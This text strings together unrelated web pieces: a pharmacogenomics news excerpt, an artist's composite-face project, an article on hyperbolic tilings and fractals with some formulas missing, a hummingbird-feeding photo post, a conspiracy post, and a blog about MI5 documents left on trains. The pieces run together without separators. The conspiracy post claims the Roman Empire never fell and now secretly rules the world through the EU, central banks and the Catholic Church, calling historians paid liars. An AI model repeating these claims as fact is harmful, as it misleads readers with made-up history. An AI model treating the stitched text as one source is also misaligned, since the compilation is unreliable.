Yet the availability of cheap genetic testing – and soon complete individual genome sequencing – means that such personalised information will become increasingly important in developing , testing and prescribing medicines .
Although the concept of a drug for every genome is more fiction than fact , our genes will help customise drug treatments by grouping people into categories for specific diseases , Venter says .
One set of genes may dictate a particular treatment for hypertension , whereas another set will influence which drugs are prescribed for cancer .
Saving lives
Many of those connections remain weak and medically useless for now .
By contrast , scientists have made big strides in understanding how the body breaks down drugs , a key criterion that determines dosing .
For instance , a blood - thinning drug called warfarin breaks down slowly in patients with a certain gene mutation , putting them at risk of haemorrhaging .
Knowing the sequence of a gene called CYP2C9 before prescribing warfarin can cut down on haemorrhaging and save lives .
Watson and Venter have different mutations in CYP2C9 , but this difference doesnï¿½t seem to affect how they break down warfarin .
But other drug - metabolism genes vary between the two genetic pioneers .
Most notably , Watson has two copies of a mutation in the gene CYP2D6 that affects the break down of some heart drugs , as well as antipsychotics and antidepressants .
Ng and Venter note that 3 % of Caucasians have this mutation , which is far more common among East Asians .
And although Venter seems to have the same drug metabolism as the average white male , genes that influence other traits will tell another story , McLeod , says .
Journal reference : Clinical Pharmacology and Therapeutics ( DOI : 10.1038/clpt.2008.114 )
Evolution – Learn more about the struggle to survive in our comprehensive special report .
Genetics – Keep up with the pace in our continually updated special report .
BFF
The BFF project consists of 127 drawings combining the faces of friends .
Inspired by my two - year experience working as a forensic artist , I drew the faces of 64 pairs of combined friends .
I then drew a series of composites of the composites , until finally arriving at one drawing emergent from all 128 faces .
I drew using charcoal pencils on 8.5 x 11 ″ Stonehenge paper – the same size used when I was working as a forensic artist .
From 2007 - 2008 , I accepted photo submissions for the project through my website .
The first 64 people who sent in usable photos were included , and drawings were made in the order that the photos were received .
Participants include people from many countries including the USA , Canada , United Kingdom , Australia , Brazil , and China .
After years of intermittent work , the final drawing was completed in May 2018 .
For Sets 1 and 2 , I chose individual features from each face to be combined into a composite portrait ( similar to the process I used while working as a forensic artist ) .
For Sets 3 - 7 , I averaged each individual facial feature together to create hybrid faces in an effort to remove my subjectivity from the compositing process .
Hybridized names were created for all drawings as well .
From the initial set of 64 , the original drawings have been sent to the friends of the people who sent in the photos ( at least , to those I could still get in touch with ) – an experiment in gift economy .
This video shows every combined face in the project surrounded by the photos or drawings it is derived from .
This video shows the lineage from each photo submission through all seven sets of drawings to the final composite face .
BFF Set 1
Set # 1 , 1 : Locha ( Jascha and Loren ) Set # 1 , 2 : Milly ( Kelly and Michelle ) Set # 1 , 3 : Jara ( Jay and Tara ) Set # 1 , 4 : Mephanike ( Stephanie and Mike ) Set # 1 , 5 : Lauri ( Lauryn and Cari ) Set # 1 , 6 : Roson ( Allison and Rosie ) Set # 1 , 7 : Mason ( Jason and Matt ) Set # 1 , 8 : Torence ( Tobi and Dorence ) Set # 1 , 9 : Nollis ( Allison and Noah ) Set # 1 , 10 : Charven ( Charity and Steven ) Set # 1 , 11 : Hash ( Hatim and Shawn ) Set # 1 , 12 : Dom ( Tom and Derek ) Set # 1 , 13 : Jimarigny ( Jim and Marigny ) Set # 1 , 14 : Tistin ( Tim and Kristin ) Set # 1 , 15 : Mera ( Megan and Laura ) Set # 1 , 16 : Dee ( Fee and Dale ) Set # 1 , 17 : Narolie ( Aaron and Natalie ) Set # 1 , 18 : Chanica ( Chase and Monica ) Set # 1 , 19 : Tril ( April and Tim ) Set # 1 , 20 : Allikat ( Allistair and Kat ) Set # 1 , 21 : Magbia ( Raabia and Maggie ) Set # 1 , 22 : Tyrah ( Tyler and Sarah ) Set # 1 , 23 : Harris ( Harley and Chris ) Set # 1 , 24 : Narfan ( Snarf and Danny ) Set # 1 , 25 : Amistopha ( Amina and Christopher ) Set # 1 , 26 : Christogar ( Christopher and Edgar ) Set # 1 , 27 : Rathloy ( Kathleen and Roy ) Set # 1 , 28 : Benoa ( Noa and Benji ) Set # 1 , 29 : Diarock ( Diana and Brock ) Set # 1 , 30 : Erizzy ( Erin and Lizzy ) Set # 1 , 31 : Kelmat ( Kelly and Matt ) Set # 1 , 32 : Stanna ( Stacey and Jenna ) Set # 1 , 33 : Matherix ( Max and Catherine ) Set # 1 , 34 : Yaslio ( Yasmin and Helio ) Set # 1 , 35 : Shandy ( Shane and Andy ) Set # 1 , 36 : Kirstali ( Kirsten and Ali ) Set # 1 , 37 : Michleen ( Michael and Cathleen ) Set # 1 , 38 : Adrox ( Roxie and Adrien ) Set # 1 , 39 : Mikola ( Nicola and Mike ) Set # 1 , 40 : Kyphanile ( Stephanie and Kyle ) Set # 1 , 41 : Jaura ( Jay and Laura ) Set # 1 , 42 : Shean ( Sean and Shane ) Set # 1 , 43 : Brassica ( Jessica and Brad ) Set # 1 , 44 : Yashew ( Matthew and Yasmin ) Set # 1 , 45 : Kathred ( Fred and Kathryn ) Set # 1 , 46 : Kellicia ( Alicia and Kelley ) Set # 1 , 47 : Gordrim ( Gord and Yae Rim ) Set # 1 , 48 : Jedrew ( Andrew and Jed ) Set # 1 , 49 : Dather ( Heather and Dave ) Set # 1 , 50 : Shané ( Shannon and José ) Set # 1 , 51 : Sarni ( Jenni and Sarah ) Set # 1 , 52 : Zhaiqi ( Dong Qian and Zhai An Qi ) Set # 1 , 53 : Mistal ( Michelle and Crystal ) Set # 1 , 54 : Sarex ( Sarah and Alex ) Set # 1 , 55 : Othui ( Otter and Huihui ) Set # 1 , 56 : Leitiago ( Leiticia and Tiago ) Set # 1 , 57 : Junzhou ( Jun Yin and Qing Zhou ) Set # 1 , 58 : Leomires ( Leonardo and Thamires ) Set # 1 , 59 : Devonessa ( Devon and Vanessa ) Set # 1 , 60 : Marcela ( Marcos and Ângela ) Set # 1 , 61 : Gustiana ( Fabiana and Gustavo ) Set # 1 , 62 : Brill ( Brian and Bill ) Set # 1 , 63 : Danvio ( Daniele and Flávio ) Set # 1 , 64 : Juliandrei ( Julianne and Andrei )
BFF Set 2
Set # 2 , 1 : Micha ( Locha & Milly ) Set # 2 , 2 : Jaranike ( Jara & Mephanike ) Set # 2 , 3 : Rosi ( Lauri & Roson ) Set # 2 , 4 : Torson ( Mason & Torence ) Set # 2 , 5 : Vennolli ( Nollis & Charven ) Set # 2 , 6 : Dash ( Hash & Dom ) Set # 2 , 7 : Timarist ( Jimarigny & Tistin ) Set # 2 , 8 : Demera ( Mera & Dee ) Set # 2 , 9 : Charolie ( Narolie & Chanica ) Set # 2 , 10 : Kattril ( Tril & Allikat ) Set # 2 , 11 : Tybia ( Magbia & Tyrah ) Set # 2 , 12 : Narris ( Harris & Narfan ) Set # 2 , 13 : Christopha ( Amistopha & Christogar ) Set # 2 , 14 : Benloy ( Rathloy & Benoa ) Set # 2 , 15 : Diarizzy ( Diarock & Erizzy ) Set # 2 , 16 : Kelna ( Kelmat & Stanna ) Set # 2 , 17 : Yatherio ( Matherix & Yaslio ) Set # 2 , 18 : Shantali ( Shandy & Kirstali ) Set # 2 , 19 : Microx ( Michleen & Adrox ) Set # 2 , 20 : Kyphola ( Mikola & Kyphanile ) Set # 2 , 21 : Jaush ( Jaura & Shean ) Set # 2 , 22 : Yassica ( Brassica & Yashew ) Set # 2 , 23 : Kathricia ( Kathred & Kellicia ) Set # 2 , 24 : Drimdrew ( Gordrim & Jedrew ) Set # 2 , 25 : Dasha ( Dather & Shané ) Set # 2 , 26 : Zharni ( Sarni & Zhaiqi ) Set # 2 , 27 : Sartal ( Mistal & Sarex ) Set # 2 , 28 : Huileio ( Othui & Leitiago ) Set # 2 , 29 : Zhoumir ( Junzhou & Leomires ) Set # 2 , 30 : Voncela ( Devonessa & Marcela ) Set # 2 , 31 : Brustianill ( Gustiana & Brill ) Set # 2 , 32 : Daliando ( Danvio & Juliandrei )
BFF Set 3
Set # 3 , 1 : Jaricha ( Micha & Jaranike ) Set # 3 , 2 : Sonro ( Rosi & Torson ) Set # 3 , 3 : Dannolli ( Vennolli & Dash ) Set # 3 , 4 : Demarist ( Timarist & Demera ) Set # 3 , 5 : Katolie ( Charolie & Kattril ) Set # 3 , 6 : Risty ( Tybia & Narris ) Set # 3 , 7 : Tophaloy ( Christopha & Benloy ) Set # 3 , 8 : Rizna ( Diarizzy & Kelna ) Set # 3 , 9 : Talerio ( Yatherio & Shantali ) Set # 3 , 10 : Lamiphox ( Microx & Kyphola ) Set # 3 , 11 : Yaushica ( Jaush & Yassica ) Set # 3 , 12 : Kathrim ( Kathricia & Drimdrew ) Set # 3 , 13 : Zharda ( Dasha & Zharni ) Set # 3 , 14 : Talhui ( Sartal & Huileio ) Set # 3 , 15 : Celamir ( Zhoumir & Voncela ) Set # 3 , 16 : Briando ( Brustianill & Daliando )
BFF Set 4
Set # 4 , 1 : Sonicha ( Jaricha & Sonro ) Set # 4 , 2 : Aristolli ( Dannolli & Demarist ) Set # 4 , 3 : Riskato ( Katolie & Risty ) Set # 4 , 4 : Riztoph ( Tophaloy & Rizna ) Set # 4 , 5 : Phoxerio ( Talerio & Lamiphox ) Set # 4 , 6 : Rimschica ( Yaushica & Kathrim ) Set # 4 , 7 : Hiuda ( Zharda & Talhui ) Set # 4 , 8 : Andomir ( Celamir & Briando )
BFF Set 5
Set # 5 , 1 : Sonaris ( Sonicha & Aristolli ) Set # 5 , 2 : Tophkato ( Riskato & Riztoph ) Set # 5 , 3 : Chixeria ( Phoxerio & Rimschica ) Set # 5 , 4 : Hiudomir ( Hiuda & Andomir )
BFF Set 6
Set # 6 , 1 : Naritoph ( Sonaris & Tophkato ) Set # 6 , 2 : Xeriomir ( Chixeria & Hiudomir )
BFF Set 7
Set # 7 , 1 : Xeriotoph ( Naritoph & Xeriomir )
Time - lapse rendering of the final drawing .
Many people will have seen and been amazed by the beauty and intricacy of fractals like the one shown below .
This particular fractal is known as the Apollonian gasket and consists of a complicated arrangement of tangent circles .
[ Click on the image to see this fractal evolve in a movie created by David Wright . ]
Few people know , however , that fractal pictures like this one are intimately related to tilings of what mathematicians call hyperbolic space .
One such tiling is shown in figure 1a below .
In contrast , figure 1 b shows a tiling of the ordinary flat plane .
In this article , which first appeared in the Proceedings of the Bridges conference held in London in 2006 , we will explore the maths behind these tilings and how they give rise to beautiful fractal images .
Figure 1a : A non-Euclidean tiling of the disc by regular heptagons .
Image created by David Wright .
Figure 1b : A Euclidean tiling of the plane by regular hexagons .
Image created by David Wright .
Round lines and strange circles
In hyperbolic geometry distances are not measured in the usual way .
In the hyperbolic metric the shortest distance between two points is no longer along a straight line , but along a different kind of curve , whose precise nature we 'll explore below .
The new way of measuring makes things behave in unexpected ways .
As an example , think of a point c and imagine all the points that are a certain distance r away from c .
In our ordinary geometry , called Euclidean geometry after the ancient Greek mathematician Euclid , these points form a circle , namely the circle that has centre c and radius r.
The circumference of the circle is related to its radius by the well - known equation
A kale leaf is crinkled up around its edge .
In hyperbolic geometry , because distances are measured differently , the points that are equally far away from our point c still form a circle , but c is no longer at what looks like its centre .
The circumference of this hyperbolic circle is proportional not to its radius , but to eradius , where e is the base of the natural logarithm and is roughly equal to 2.718 .
If the radius is large , then this means that the circumference of a hyperbolic circle is much larger than that of a Euclidean circle .
So to fit into ordinary Euclidean space , a big hyperbolic disc has to crinkle up round its edges like a kale leaf .
Once you start looking for it , you see this type of growth throughout the natural world .
( You can read more about hyperbolic geometry , in the Plus article Strange geometries . )
Hyperbolic tilings in two dimensions ...
The same exponential growth law is manifested in our tiling of figure 1a .
Here the disc is filled up by tiles that are arranged in layers around the centre .
If you count carefully , you will find that the number of tiles in the nth layer is exactly 7 times the 2nth Fibonacci number :
n Tiles in nth layer 2nth Fibonacci number 1 7 1 2 21 3 3 56 8 ... ... ... 8 6909 987 Figure 1a
This is in marked contrast with Euclidean tilings , where the growth law is linear .
For example , the honeycomb tiling in figure 1b has exactly 6n hexagons in the nth layer .
The numbers here grow much slower :
n Tiles in nth layer 1 6 2 12 3 18 ... ... 8 48 Figure 1b
Despite appearances , in the world of hyperbolic geometry the tiles in figure 1a all have the same size and shape .
To fit the tiles into a Euclidean picture , we have to shrink their apparent size as we move away from the centre of the disc , so that to our Euclidean glasses the tiles look smaller and smaller as they pile up near the edge of the disc .
Since you can fit infinitely many layers of tiles between the centre of the disc and its boundary , in our hyperbolic way of measuring , the boundary must be infinitely far away from the centre .
In this strange geometry the diameter of the disc is infinite .
For this reason , the boundary circle is called the circle at infinity .
Figure 2 : All of the hyperbolic plane fits into the disc bounded by the blue circle .
The role of straight lines in this geometry is played by arcs of circles that meet the boundary in right angles , like the red arc shown here .
Measured in the hyperbolic metric , the sides of each tile in figure 1a have the same length , as do the sides of any two distinct tiles .
Although the sides of each tile look slightly curved to us , in the hyperbolic metric they are actually straight .
To understand this , forget about your intuitive understanding of straightness for a moment and take a slightly more abstract view : a path is " straight " if it gives you the shortest distance between its end - points .
In the hyperbolic metric , the shortest distance between two points is along the arc of a circle that meets the circle at infinity at right angles , as shown in figure 2 .
The sides of the tiles in figure 1a are pieces of circles with precisely this property .
The tiles are bounded by straight line segments all of which have the same length and , as it turns out , meet at the same angle — the tiles are regular hyperbolic polygons .
If you were a two - dimensional hyperbolic being , the tiles shown in figure 1a would all seem the same to you , they would all look like regular heptagons .
Since the boundary circle is infinitely far away , you would never be able to get to it or even be aware of it .
Your whole world would be contained inside the disc , with the tiles stretching out to the horizon like an infinite chess board .
... and in three dimensions
Figure 3 : A cube is a volume enclosed by six intersecting planes .
Each of the six faces of the cube is part of one of these planes .
Now imagine a similar geometry in three dimensions .
Just as the two - dimensional hyperbolic plane can be visualised as a disc enclosed by its circle at infinity , so the three - dimensional hyperbolic universe can be visualised as a solid ball , enclosed in a Euclidean sphere .
The sphere 's boundary is infinitely far , in hyperbolic terms , away from its centre .
The tiles now become solid three - dimensional objects , the hyperbolic analogue of polyhedra .
In Euclidean geometry regular polyhedra are volumes enclosed by a number of intersecting flat planes .
A cube , for example , is the volume you get from six planes , each intersecting four others at right angles ( see figure 3 ) .
Figure 4 : Hyperbolic 3 - space can be visualised as the inside of a sphere .
A hyperbolic plane is a part of a plane that meets the sphere at infinity at right angles .
Image created by David Wright .
But what does a hyperbolic plane look like ?
In two - dimensional hyperbolic space the role of straight lines was played by circular arcs meeting the bounding circle at right angles .
Similarly , the role of planes in hyperbolic three - space is played by pieces of spheres .
These sit inside the big sphere that bounds our hyperbolic universe , meeting the boundary sphere at right angles ( see figure 4 ) .
A hyperbolic polyhedron is the volume you get by intersecting several hyperbolic planes .
And just as you can tile Euclidean space by certain polyhedra , for example by cubes , you can tile hyperbolic three - space by hyperbolic polyhedra .
Figure 5 , a still from the remarkable movie Not Knot ! , shows such a tiling seen from deep inside hyperbolic space , far away from the bounding sphere at infinity .
Figure 5 : A tiling of three - dimensional hyperbolic space .
Image created by Charles Gunn of the Technische Universität Berlin .
It is a still from the movie Not Knot ! , published by A K Peters Ltd .
The window pane at infinity
As you might imagine from figure 5 , tilings of hyperbolic 3 - space are rather hard to draw .
As an easier substitute , mathematicians usually study what they see on the boundary of hyperbolic space , that is on the sphere that defines the hyperbolic universe .
The patterns we get here are of amazing beauty .
They are easier to describe because the surface of a sphere is a two - dimensional object and can be projected onto a flat plane .
In two dimensions the analogue of this would be to study what we can see on the boundary of the disc , namely the circle .
In the case of figure 1a this is not very interesting : the tiles simply pile up all the way round the circle .
Now suppose that the original tile is still a polygon with a finite number of sides , but that it stretches all the way out to the boundary , like the yellow region in figure 6 .
Then each of its copies meets the circle in four circular arcs .
Although the tiles fill up all of two - dimensional hyperbolic space ( the interior of the disc ) , the totality of the arcs do not fill up the whole circle .
Figure 6 : A non-Euclidean tiling of the disc by a polygon with some sides at infinity .
Image created by David Wright .
The set of omitted points has interesting properties , for example it is a fractal .
It is an example of what is called mathematically a , more colloquially , a .
( You can find out more about Cantor sets inarticles Measure for measure and How big is the Milky Way ?
If you were a two - dimensional being living in the same plane as the disc , but outside it , then what you would see of each hyperbolic polygon would be the circular arc in which it meets the boundary circle .
In three dimensions the analogue of a polygon with a finite number of sides is a polyhedron with a finite number of faces .
Outside observers will see these faces as shadows where the polyhedron meets the sphere .
Figure 7a below shows the sphere with four - sided shapes which are faces of polyhedra that tile its inside .
They pile up in remarkable patterns on the boundary of the sphere , like noses pressed against a window pane .
Figure 7 b shows the patterns on the sphere projected onto the plane ; this time with a different colour scheme .
Figure 7a : Faces of polyhedra in a 3 - dimensional hyperbolic tiling pressed against the sphere at infinity .
Image created by David Wright .
Figure 7 b : The tiling of the sphere projected onto the plane .
Image created by David Wright .
Patterns like this were studied by the German mathematician Felix Klein ( 1849 - 1925 ) .
In the 1980s David Mumford realised that they were a natural target for computer exploration .
With David Wright , he embarked on a systematic study which eventually resulted not only in inspiring new mathematics , but also in the book Indra 's Pearls .
The book shows off some of the remarkable patterns that arise on the window pane at infinity .
It explains these patterns with the minimum of mathematical baggage , but with enough detail for the mathematically inclined to follow the reasoning and for the computationally inclined to make their own pictures .
The maths
The Euclidean tiling from Figure 1 again .
To create a two - dimensional tiling , whether it 's Euclidean like the one of figure 1b , or hyperbolic , you need a way of creating identical copies of an initial tile and placing them alongside each other .
Mathematically , this job is done by reflections , rotations and translations : you get to each tile either by shifting your initial tile into a given direction by a given distance — this is known as a translation — by reflecting it in an axis , or by rotating it through a given angle around a fixed point .
Or , indeed , by a combination of any of these three movements .
Rotations , reflections and translations , and the movements you get by doing them in sequence , are collectively known asor .
" Rigid " because they do not distort distances or angles and " symmetries " because they can leave symmetrical shapes unchanged .
To describe a tiling , all you need is a description of the initial tile together with a list of symmetries that generate the tiling .
Although there are infinitely many tiles , the list of symmetries can be finite , because it may be possible to get to all the tiles by performing the same symmetries over and over again .
The same is true of three - dimensional Euclidean space .
To tile it by polyhedra , for example by cubes , you start with a central polyhedron and repeatedly perform a number of symmetries , only this time you allow three - dimensional rotations , translations and reflections .
Tilings of three - dimensional hyperbolic space are generated in the same way : you start with a hyperbolic polyhedron and repeatedly perform a number of hyperbolic symmetries until you have filled up the whole universe .
Without thinking too hard about what hyperbolic symmetries might look like , remember that we are interested in what happens on the sphere that bounds our hyperbolic universe .
This means that we need to start with a face of the polyhedron that presses against the bounding sphere and repeatedly perform a number of movements , watching copies of the face pile up on the sphere as they do in figure 7 .
But how can we describe these movements ?
Remember that our symmetries leave hyperbolic distance intact .
But we are working on the bounding sphere at infinity , where we can no longer measure distance in the same way .
In fact , on the window pane at infinity it is impossible to find a way of measuring distance that is preserved .
But all is not lost : it turns out that the transformations we are looking for do leave something intact .
They transform circles into circles , with changes of radius being allowed .
Such transformations are called Möbius transformations , after the German mathematician August Möbius ( 1790 - 1868 ) .
To describe these transformations , mathematicians project the sphere onto a flat plane using stereographic projection : place a light bulb on the North pole of the sphere so that each point of the sphere has its unique and very own shadow on the plane below .
Every point except the North pole that is , but mathematicians have a way of dealing with this and we can safely ignore the North pole here .
Figure 8 : Stereographic projection - draw a line from the North pole through a given point on the sphere .
The point 's shadow is the place where the line hits the plane below .
Image created by David Wright .
The formulae of Möbius transformations look neatest when we use complex numbers .
If we think of each point ( x , y ) of the plane as the corresponding complex number z = x + iy , then a Möbius transformations transforms the plane by moving each point z to
where a , b , c and d are fixed complex numbers .
( If you 'd like to find out more about complex numbers , read this short introduction or the Plus article Curious quaternions . )
Piling up
What we really want to study is how tiles like those in figure 7 ( or , more precisely , their projected images in the plane ) pile up in the plane as they are being moved around by Möbius transformations .
For example , we can start with the two transformations
Then take a basic shape , say a stick man , and apply both of these transformations to the figure over and over again .
As you can see in figure 9 , the images get small and are distorted as the level of the repetition increases .
If you choose the starting transformations cleverly , the patterns which emerge when the images pile up are amazingly beautiful .
[ Click on the image to see a movie of the stick man piling up . ]
To see more clearly what is going on , we often drop the original shape altogether and just look at the region where its smaller and smaller images pile up .
This is called the limit set or chaotic set of the iteration , because in this part of the pictures the symmetries act in a chaotic way .
( Though to a mathematician , the chaos is very controlled . )
The limit set is shown in figure 10 .
By choosing the initial symmetries with enough care , we can create limit sets with intricate patterns of tangent circles .
The two transformations written down above produce the famous Apollonian Gasket , which is shown at the beginning of this article .
In other examples the tangent circles spiral in beautiful patterns :
Figure 11 : Another limit set .
Image created by David Wright .
A similar spiralling pattern is shown in figure 12 .
Click on the image to see a movie of the limit set being drawn .
After drawing the limit set , the program will zoom in on it , revealing the breathtaking intricacy of this fractal .
How and why these beautiful fractals arise from the maths is explored in great detail in the book and its accompanying website , which also contains instructions for programming your own images .
Indra 's pearls
Why did we call our book Indra 's Pearls ?
In western thought , the infinite is conceived as counting without end , a flock of sheep going through the gate forever : one , two , three , .. one hundred and one , one hundred and two , .....
But there are other ways of getting to infinity .
Remember the man with seven wives .
Kits , cats , sacks and wives , quite a lot of traffic enroute to St Ives !
In fact the traffic increases exponentially with the number of levels ( kits , cats , ... ) .
Such exponential growth reminds us of hyperbolic tilings , typically formed by a similar repetitive process .
In figure 13 below , we start with six disjoint circles .
For each circle C it is possible to find a transformation which swaps the inside and the outside of C and leaves every point on C itself fixed .
These transformations are often called inversions — inverting in C is reminiscent of a " reflection " , only we do n't reflect in a straight line , but in the circle .
Except for the fact that , like any reflection , it turns things back to front , an inversion is a special kind of Möbius transformation .
When we perform this " reflection " in C , the other five circles , which are outside C , get reflected into five smaller circles inside it .
If we do this for each of the six circles , we end up with each of them containing five smaller second level circles .
The repeat operation produces five more small circles inside each of these second level circles : now each of the six initial circles contains 52 = 25 circles in all .
At the next level , we will have 53 = 125 tiny circles .
And so on .
Figure 13 : Worlds within worlds .
Image created by David Wright .
In many eastern philosophies , especially Buddhist , this idea of the infinite appearing from copies within copies is pervasive : " In a single atom , great and small lands , as many as atoms . "
This concept was so exactly reflected in the mathematics of our pictures that it inspired our title , taken from the ancient Buddhist myth of Indra 's Web :
In the heaven of the great god Indra is said to be a vast and shimmering net , finer than a spider 's web , stretching to the outermost reaches of space .
Strung at each intersection of its diaphanous threads is a reflecting pearl .
Since the net is infinite in extent , the pearls are infinite in number .
In the glistening surface of each pearl are reflected all the other pearls , even those in the furthest corners of the heavens .
In each reflection , again are reflected all the infinitely many other pearls , so that by this process , reflections of reflections continue without end .
About this article
A version of this article first appeared in the Bridges ( Mathematical Connections in Art Science and Music ) Conference Proceedings held in 2006 in London .
Copies of the Proceedings can be obtained from Tarquin Books in Europe and at mathartfun.com in the US .
The book Indra 's Pearls was written by David Mumford , Caroline Series and David Wright .
It is published by Cambridge University Press .
Caroline Series is a Professor of Mathematics at Warwick University .
She was born and educated in Oxford and was an undergraduate at Somerville .
Having done her PhD at Harvard as a Kennedy scholar , she returned to the UK and has been at Warwick since 1979 .
She likes finding the patterns behind geometrical structures , and her research area , non-Euclidean or hyperbolic geometry , is closely related to fractals and chaos .
David Wright gained his doctorate in number theory in 1982 from Harvard under the excellent direction of Barry Mazur , despite spending most of his time engaged in visual mathematical explorations with David Mumford .
He is currently Professor of Mathematics at Oklahoma State University , and has two wonderful daughters Alexandra and Julie .
The author 's picture was provided by the latter , currently a concentrator in Visual Arts , French and Mathematics at Harvard .
Abigail feeding hummingbirds in her jammies at 8:am
On September 14 , 2006 my wife Abigail decided she 'd like to ' touch ' one of the 20 or 30 hummingbirds that were swarming around our feeder at the peak of their migration .
With patience and determination she accomplished her goal .
I am her husband Sam , and I shot the photos of her hand - feeding hummingbirds in our yard here in near Franklinton , Louisiana .
On September 20thThe Era Leader newspaper published the photos on the front page .
We then emailed them to a few of our friends and had no idea they would quickly be forwarded around the world .
Many of our friends have called or emailed us saying they were forwarded photos of a lady feeding hummingbirds , and it was Abigail !
Had I known the photos would spread like wildfire , I would have put our names on them .
A Google search shows many sites , blogs , and forums posting these photos , with many people being skeptical of their authenticity .
As a Photoshop user myself , I understand the skepticism .
I can assure you that the photos are authentic in every way , with only standard adjustments such as cropping , sharpening , etc .
We were also contacted by the Urban Legends dept. at About.com .
Many people had forwarded the photos to them asking if they were real or fake .
You can read the article here .
On a sad note , we were informed that one of Abigail 's photos below had been used to win the Photo Friday picture contest on Lexington , Kentucky television station WTVQ .
Each week the station awards prizes for the best photograph taken in Kentucky that week .
A woman submitted the photo of the hummingbirds perched on Abigail 's hands , claimed that it was her , and won .
We hope she 's enjoying her prize .
[ UPDATE ] Mr. Jon James , chief meteorologist of WTVQ contacted us and apologized for being scammed by the woman who submiited our photo in order to win the contest .
He said he would address this in one of his broadcasts and " call her out " .
Thanks ,
Jon !
Hummingbird justice has been served !
This has been quite an experience , and has drawn a lot of attention from people around the world .
We hope that you enjoy the photos , especially now that you know they are real .
~ Sam Alfano
All photos taken with a Canon 20D w/50 mm f1.4 lens NEWS FLASH ! - Urban legend site Snopes.com investigates and authenticates Abigail 's amazing hummingbird encounter .
[ more info ]
The United States of America has the largest - empire to date .
Please review facts :
"- Roman Empire at it 's largest - 1,930,511 sq mi in area
- United States - 3,794,066 sq mi in area
Population :
- Roman Empire at it 's most populous - 88,000,000 ppl
- United States 2008 census - 304,072,000
United States wins hands down . "
-- http://answers.yahoo.com/question/index;_ylt=Amvo3...
However , there many reasons to believe the Roman Empire never fell :
Please also review the following research - results , which may ( or may not ) change your mind about the Roman Empire :
Roman Empire / World Government :
The Roman Empire was ( and still is ) the biggest empire on earth .
The Roman Empire spread throughout the world .
It is now commonly referred to as the " world - government " .
They still claim to accept Roman - Catholicism as their official religion .
That explains why so many government - buildings in Washington D.C. and London are made to resemble buildings in Rome .
Also note : Each of those nations refer to the Roman - Catholic church as the official church of the European Union & South American Union even though government - paid historians tell us to believe the Roman Empire was completely destroyed by random vikings , which supposedly came from the countries of Sweeden , Norway and Denmark .
If the Vikings were strong ( and large ) enough to defeat the whole Roman Empire , that would be the greatest defeat man has ever known .
Even China & Japan could n't bring down the Roman Empire .
It 's too vast & stronger than them .
That 's one of the reasons why the Roman Empire has dissolved the sovereignty of so many nations , in such a short amount of time .
They formed the European Union more than 30 years ago , and set up a world bank .
Note : The Nazis were used to conquer most of Europe , just like " Alexander the Great " was used to conquer most of the Eurasian countries ( especially Syria ) .
The Roan Empire / world government has been installing puppet - dictators to control populations for centuries .
We can't afford to believe those government - paid historians , who tend to mislead school - children ( and adults ) into believing that the Roman Empire fell , when it 's clear that Roman Catholicism was a major part of that empire ( and it 's still a major part of it , today ) .
The Roman Catholic church is the official church of the majority of the fiat - governments in Latin America and the rest of Europe .
Even the Nazis followed & observed Roman traditions to fulfill the wishes of the Roman Pope , throughout the 1930s & 1940s .
Notice how so - called sovereign - nations have adopted symbols of the " Holy Roman Empire " / Roman Catholicism :
 http://en.wikipedia.org/wiki/Coat_of_arms_of_Germa...
" The Romans built arches of triumph to celebrate the big victories won by the Roman Empire , while Hitler built them to celebrate victories he had not yet won . "
Nazis count the Holy Roman Empire as the first Reich :
 http://www.germannotes.com/hist_ww2.shtml
 http://en.wikipedia.org/wiki/Flag_of_Germany
A lot of symbols of the Roman Empire are used on coins , which are manufactured in all of their world - banks ( especially the Bank of England & Federal Reserve Bank )
 http://www.dmudd.net/hist697/msfinalhist.htm
Watch the Documentary called : " Money Masters "
http://video.google.com/videoplay?docid=-515319560...
It explains how the Romans have conquered not only the majority of the nations in the world , but they 've also established central - banks in all of those countries , which they still dominate .
Since the Roman Empire is now a globalist - entity .
It goes by many names , such as United Nations & Counsel of Foreign Relations .
They have conquered all english - speaking countries ( including Western European nations plus North & South American countries ) .
Their technology has always been more advanced than any other empires .
The Mongolian Empire did n't even have a chance against the Roman , Greek , and Egyptian kingdom ( which was later conquered by Rome ) .
After Rome conquered Israel , they 've been rising & increasing their strength throughout the world .
Historians even admit that the Nazis followed the wishes of Roman Catholic Church ( just another part of the Roman Empire ) .
Every country that keeps & observes the Gregorian - calendar ( a.k.a. Julian - calendar ) has been dominated by the Roman Empire .
The Roman Empire / World Government has control over the following unions :
South American Union
North American Union
European Union
All of them collaborate within the Roman Empire / World Government .
So the empire of the Romans still exists , but it 's become international / worldly organization , which shares " power " with communist dictators ( excluding Hugo Chavez of Venezuela & Raul Castro of Venezuela ) .
The Vikings never defeated the Roman Empire .
No one has done that , yet .
School teachers tend to try to convince their students that Rome fell .
It never fell .
It tripped , and then it regrouped , and became globalist - government .
So far , the Romans have conquered the following nations :
 Great Britain ( that explains why Queen Elizabeth still refers to herself as a Roman Catholic ) .
 Germany ( that explains why it's part of the European Union , which considers Roman Catholicism as their official religion ) .
 Khazaria ( that explains why a large part of that former - nation was renamed Romania ) .
 Egypt ( that explains why Romans intermarried with the Egyptian / Babylonian Royal family , and now Africa has many Catholic Churches , which claim to be just " Christian " , however they still have allegiance to the Nazi- German Pope in Rome ) .
 Israel ( Romans have never lost control of Israel since the Nazi / Zionists used British Troops to establish military bases , there ) .
I pointed out before that data leak prevention is impossible .
There are just too many ways for a determined data thief to walk out the door with your most sensitive information .
MI5 the supposedly super secret branch of the UK government has had its data protection failings this past week .
If you are a fan of le Carre ’s Smiley you are familiar with the data leak prevention system in place at MI5 for safe guarding critical files .
( A “ file ” in the context of secret agencies is a folder containing information printed on tree pulp .
I know , crazy in this day and age that anyone still uses those but that is the way it is . )
Anyway , there is a well guarded vault full of these “ files ” and various people with a need to know check them out and read them at their desk .
They must return them to the vault and only under extraordinary circumstances are they allowed to be carried out of the building in a special satchel called a brief case .
( Not available at Timbuk2 ) .
This past Tuesday two reports on Al Qaida ’s strengths and weaknesses were left on a commuter train .
The documents were left on the train by “ a highly placed member of the Joint Intelligence Committee 's assessment staff …
The fear is that the documents , which also revealed the names of senior MI5 and MI6 officers , may have remained on the train for some time and been read by other people or even copied using a mobile phone camera .
Worse , whoever found them turned them over to the BBC who read them .
And then , on Wednesday
Secret government documents detailing the UK's policies towards fighting global terrorist funding , drugs trafficking and money laundering have been found on a London - bound train and handed to ' The Independent on Sunday ' .
The government papers , left on a train destined for Waterloo station , on Wednesday , contain criticism of countries such as … The confidential files outline how the trade and banking systems can be manipulated to finance illicit weapons of mass destruction in Iran .
